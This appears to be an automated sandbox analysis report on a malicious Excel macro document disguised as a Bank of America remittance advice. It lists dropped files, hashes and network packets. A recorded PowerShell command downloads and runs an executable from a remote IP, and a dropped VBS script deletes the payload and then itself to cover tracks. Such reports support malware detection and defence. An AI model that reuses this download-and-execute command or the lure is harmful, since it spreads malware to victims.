SHA1:	3322111384C098DFDE8B8CDDF60CA078C642CB35
SHA-256:	4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
SHA-512:	3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
Malicious:	false
Reputation:	unknown
Preview:	...].~.g.a........P..O=.........U.....8..q.F....\..k.e..#....A~c.A\..pA^..Z.zZ....".".."....b&..S...?Y......."...f..[.#<.&./6.\|^..Z.zZ....".".."../6...Y...!....0..F...s...K .&.3m....a.F..6..va..S......0.....].k..k.l./e....2...P.../n.[........4............m..G.].4.k.....Y....6.}..:.J....Y.S..,.W.?6.0.. .-e...N..2..%.C:.G>.9.A1...e...l..c....&.].....(.V;`y.Q..I=:.....d.4......z.JBLDR..D"PC.S0.+..._#.x..3."1...2.^.......qsod."&.g.0...I...`...v.....@.k:K.?....;e5..s....y.C...%.....o.\|.J../.....[$,....._+.?.^...+........_1...K.._&.=.....t..>k.A.........?.PBY'.4ur..V.R.....?..g."6wa.W2..h.....$+...M...R.v.O.....c.R..l..f.'aKq.{{wz.r.{....Z.(..m.c...t.m.@qa..%.5.k.Fz..Y/..\|.um...yd.......&._3.:`..=....k........A.DM....A...FT.ye.b......w.;..t..l.$-....h...?...U5...c...v..%.5.k.FS9.R.A....}]...>.Q.FA.x..)..:r..qi.owwus~..I.6oe.v.....=.f.....DY'.O.FTK9.TG..L.._3..=.}_.+...M.....@\|....[....LM.E..S1&.Q&..Z... ?..1.-...~.6O.J.i...S!.R.q`....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	18076
Entropy (8bit):	5.576492263633333
Encrypted:	false
SSDEEP:	384:Pt9Srk09rSuWVGWl0hw+CSBKnyr8uldLPIH779k9kpoyArYGy:wskWlUQ4Kyr8ulx3GrBR
MD5:	9EE0195F2F0604B0CB007F70008C9B93
SHA1:	B6AC7BA8B59A4B40ACA12F7C3C92332EC2E3A020
SHA-256:	AF6A0D926D880962533579EFE15E0E6A43B90E8ECD3D5BB278F116E34869C540
SHA-512:	B8CFD4A7107C265CEFD8F0E82C3F23C2C1B33A27E36A787328D0B342686EA624FA766D933C4F88ED3FF2CFE21C369DA90017AB519C7B550AAAE72FDD93EA0D78
Malicious:	false
Reputation:	unknown
Preview:	@...e...................................#............@..........H...............<@.^.L."My...:H..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].2.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hggmmqj.q3u.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vrebh1n.c3g.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\bhvDE1F.tmp Download File
Process:	C:\Windows\SysWOW64\logagent.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe908559e, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.993028917297921
Encrypted:	false
SSDEEP:	24576:gi+A2TatxucRfDw/u5D0Eko5QqbMgSFDb7uBi6j:HRfDlfy
MD5:	5660F9B9328299D9F2580ED25E3CFA66
SHA1:	8816A6C5DB7D6F86C4E994A542C7ED18E8978421
SHA-256:	8BE69D5E7F42FA95A2638E4EB8E103614EEBF6B8F8EFF508374C938F3B6FFEBB
SHA-512:	4F0177B94CABF80C5DDFCCDCE26FD3C4A3C772C74A759B2F7D626C1818B29BB7408ECD309716D8227BA9D8C6A1207AC905581519E2CC692784F58FA7BED1A0C5
Malicious:	false
Reputation:	unknown
Preview:	..U.... .......N0.......te3....wg.......................5.....5....x{.%!...y..h.7.........................6..43....wI.............................................................................................Z............B.................................................................................................................. .......1!...y;.....................................................................................................................................................................................................................................`.)L4"...y.g................=d..3"...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dwhqbdxsbnvloizrbdml Download File
Process:	C:\Windows\SysWOW64\logagent.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs Download File
Process:	C:\Windows\SysWOW64\logagent.exe
File Type:	data
Category:	dropped
Size (bytes):	324
Entropy (8bit):	3.4475394351760706
Encrypted:	false
SSDEEP:	6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgU9n+SkyGkNlLWlAn9YKJRB4y0aGBrt:xQ4lA2++ugypjBQMB3D9+UN19Z/0aimi
MD5:	C76729CB5F778B8A91D8A5EE0CD36E2C
SHA1:	06A78FD67EB3214EBD4FE38DE132F698FC99E1FA
SHA-256:	9429AF02E3EB5B0000D41EDA951B2A6672A0C724E580CDA1D1E68A6B7BCF2DFD
SHA-512:	B9F098A3539454FB250D4827AD6397B765D153BF1F1385EEE2FECEB0901607FB5046BDB2655AF2E5BC37A9E4A63A00CD173BA9304233A272C0850511061178C6
Malicious:	true
Reputation:	unknown
Preview:	O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.l.o.g.a.g.e.n.t...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\Desktop\~$BoFA_Remittance Advice_21219.xlsm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:	A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:	false
Reputation:	unknown
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\20210921\PowerShell_transcript.045012.O350p8xx.20210921213404.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1312
Entropy (8bit):	5.273959423966544
Encrypted:	false
SSDEEP:	24:BxSAwVxvBnwx2DOXUWXQUhF3WDHjeTKKjX4CIym1ZJXIxQUhF12nxSAZMF:BZcvhwoO3QUzmDqDYB1Z4QUzmZZW
MD5:	7EE74DAF97A2E4019C1A06369B925BB2
SHA1:	27189DE16DDEC64B72AC89E84FB755B1BF1FEF5B
SHA-256:	B3793F6C8465507856D8F3A063F9EAA9BED59BE8D74C4EB12C30BD9B34D859E2
SHA-512:	5034E2B57A3821E9F163AE77525FF61B68AA9AE2139E27B307FAEB15297343289949C0F170CED2D0FFC513FF2375400B8FE461E4A80419F84BC295F1995C4026
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210921213418..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 045012 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe..Process ID: 6584..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210921213418..********************..PS>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri h

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.780597806123275
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52% Excel Microsoft Office Open XML Format document (40004/1) 40.40% ZIP compressed archive (8000/1) 8.08%
File name:	BoFA_Remittance Advice_21219.xlsm
File size:	209422
MD5:	54c351236ba33c74a10f1fcccf81b4fd
SHA1:	fa734041869ffc2e811aaaf6ee5e9d26f196e53f
SHA256:	61005cab010bde9798cb5c7ee05497c08ba71d638644f05a1b5e58c8eac67ca1
SHA512:	c64bf84b511fb2de7078ee406949134da3dbd71edc160759210c449ed4484151da114e4edf465dfe4743ac9543c61dce69fda0631ef8950cf8d054fb11bd56a0
SSDEEP:	6144:tGkA+6vAmW5261qSQMaMFc5K+CkmOvsGh5KAb43eFC:tkVKcn4cqkmOvSuFC
File Content Preview:	PK..........!..8..............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd0e2f696908c

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2021 21:34:33.444978952 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.592879057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.593120098 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.596232891 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.745573044 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745609999 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745629072 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745649099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745666981 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745675087 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.745683908 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745701075 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745707035 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.745718002 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745729923 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.745733976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745752096 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.745754957 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.746263981 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.893404961 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893439054 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893457890 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893476009 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893491983 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893507004 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893523932 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893546104 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893562078 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.893564939 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893583059 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893590927 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.893599033 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893615961 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893640995 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893645048 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893659115 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893676043 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893690109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893702984 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893716097 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893728018 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:33.893728971 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.893733025 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:33.894062042 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.042000055 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042032957 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042052984 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042069912 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042088032 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042107105 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042120934 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042140007 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042157888 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042171001 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042187929 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042211056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042231083 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042247057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042265892 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042270899 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.042283058 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042303085 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042320967 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042340040 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042356014 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.042360067 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042378902 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042395115 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.042396069 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042412996 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.042421103 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.042455912 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.043381929 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043414116 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043431997 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043452024 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043471098 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043478012 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.043488026 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043507099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043519974 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.043524027 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043540955 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043551922 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.043555975 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043571949 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043581963 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.043596029 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.043641090 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.189820051 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189851046 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189863920 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189877033 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189896107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189908028 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189920902 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189933062 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189946890 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189964056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189975977 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.189996004 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190016031 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190022945 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190026999 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190045118 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190066099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190085888 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190104961 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190123081 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190130949 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190140963 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190154076 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190175056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190176964 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190203905 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190208912 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190222979 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190237045 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190241098 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190253973 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190267086 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190279961 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190284014 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190299988 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190320015 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190324068 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190336943 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190354109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190356970 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190370083 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190381050 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190387964 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190403938 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190416098 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190421104 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190445900 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190470934 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190716982 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190736055 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190773964 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190797091 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190819979 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190831900 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190838099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190855026 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190879107 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190888882 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190907001 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190917015 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190922976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190941095 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.190951109 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.190977097 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.191031933 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.191083908 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.337827921 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.337857962 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338041067 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338061094 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338078976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338107109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338118076 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338129997 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338143110 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338144064 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338160992 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338172913 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338185072 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338186026 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338198900 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338212013 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338223934 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338237047 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338249922 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338263988 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338283062 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338301897 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338318110 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338334084 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338337898 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338351965 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338371038 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338391066 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338409901 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338428020 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338455915 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338464975 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338469028 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338486910 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338488102 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338510036 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338531017 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338547945 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338561058 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338536024 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338577986 CEST	80	49742	192.210.214.221	192.168.2.3
